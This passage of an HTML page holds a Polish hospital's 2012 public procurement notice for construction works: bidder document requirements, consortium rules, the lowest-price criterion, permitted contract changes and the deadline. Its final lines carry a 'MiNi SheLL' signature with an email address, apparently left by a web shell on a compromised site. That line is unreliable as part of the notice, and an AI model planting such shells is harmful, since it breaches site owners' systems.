</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Poprzez wykonawców ubiegających się wspólnie o udzielenie zamówienia rozumie się konsorcjum firm jak również wspólników spółki cywilnej.
3.	Wykonawcy zobowiązani są do przedłożenia oświadczenia (w przypadku konsorcjum Wykonawców - każdy z członków konsorcjum z osobna), potwierdzającego brak przesłanek do wykluczenia z postępowania, zgodnie z wymogami art. 24 Ustawy pzp. Wzór takiego oświadczenia stanowi załącznik nr 8 do SIWZ
4.	W przypadku, o którym mowa w punkcie 2, Wykonawcy usta?nawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, co potwierdzą stosownym pisemnym pełnomocnictwem podpisanym przez wszystkie podmioty występujące wspólnie o udzielenie przedmiotowego zamówienia.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
6.	W przypadku podmiotów występujących wspólnie:
6.1.	warunki  określone w punkcie III.1.2., 1.3 mogą być spełnione przez wszystkich Wykonawców łącznie.
6.2.	warunek określony w punkcie III.1.4.(zdolność kredytowa) może być spełniony przez wszystkich Wykonawców łącznie, z tym, że jeden z Wykonawców musi go spełniać co najmniej w 50%. 
6.3.	warunek określony w punkcie III.1.1 i 1.5. (dotyczący wykluczenia z postępowania) musi być spełniony przez każdego z wykonawców samodzielnie.
6.4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia dotyczące spełnienia warunków wskazanych w p. III.1.2. i 1.3 składa (podpisuje) pełnomocnik Wykonawców wspólnie ubiegających się o zamówienie.
7.	Do konsorcjantów, o których mowa w punkcie 2 stosuje się odpowiednio przepisy dotyczące Wykonawcy.
8.	Ocena spełnienia przez Wykonawców warunków, o których mowa w punkcie III.1. SIWZ nastąpi na zasadzie spełnia/nie spełnia na podstawie przedłożonych w ofercie oświadczeń i dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony na zasadzie art.144 ustawy PZP ustalają, że każda istotna zmiana umowy może nastąpić według zasad i na warunkach określonych poniżej. Zamawiający przewiduje możliwość dokonania zmiany umowy w następujących sytuacjach:
1.1 nastąpiła zmiana danych podmiotów zawierających umowę (w wyniku przekształceń, przejęć itp.), zmiana personaliów osób reprezentujących Wykonawcę lub Zamawiającego, zmiana siedziby Wykonawcy lub Zamawiającego, zmiana numeru konta Wykonawcy,
1.2 Termin wykonania lub zmiana przedmiotu zamówienia będą mogły ulec zmianie w wypadku:
a) z powodu siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.
b) powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którekolwiek ze stron,
c) w przypadku przesunięcia terminu realizacji inwestycji przez NFOŚiGW.
d) istnieje ewentualna możliwość zmiany harmonogramu w nieprzewidzianych sytuacjach, które mogą nastąpić w przyszłości, ale tylko pod warunkami określonymi w umowie zawartej między Zamawiającym, a NFOŚIGW, tj.:
- zmiany harmonogramu rzeczowo-finansowego wymagają dla swej skuteczności pisemnej zgody NFOŚiGW, z wyjątkiem zmian do wysokości 1.000,00 zł dokonywanych pomiędzy poszczególnymi kwotami wypłat, pod warunkiem, ze dotyczą tych samych kategorii kosztów i nie wpłynie to na obniżenie efektu ekologicznego,
- wniosek o zmianę harmonogramu rzeczowo-finansowego wymaga uzasadnienia oraz wskazania przewidywanego wpływu wnioskowanej zmiany na realizację przedsięwzięcia i osiągnięcie efektu rzeczowego oraz efektu ekologicznego przedsięwzięcia.
Zmiany te będą wymagały, pod rygorem nieważności, formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz-dzialdowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Działdowie ul. Leśna 1, 13-200 Działdowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2012 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Działdowie ul. Leśna 1, 13-200 Działdowo - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja jest współfinansowana ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu Priorytetowego System Zielonych Inwestycji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com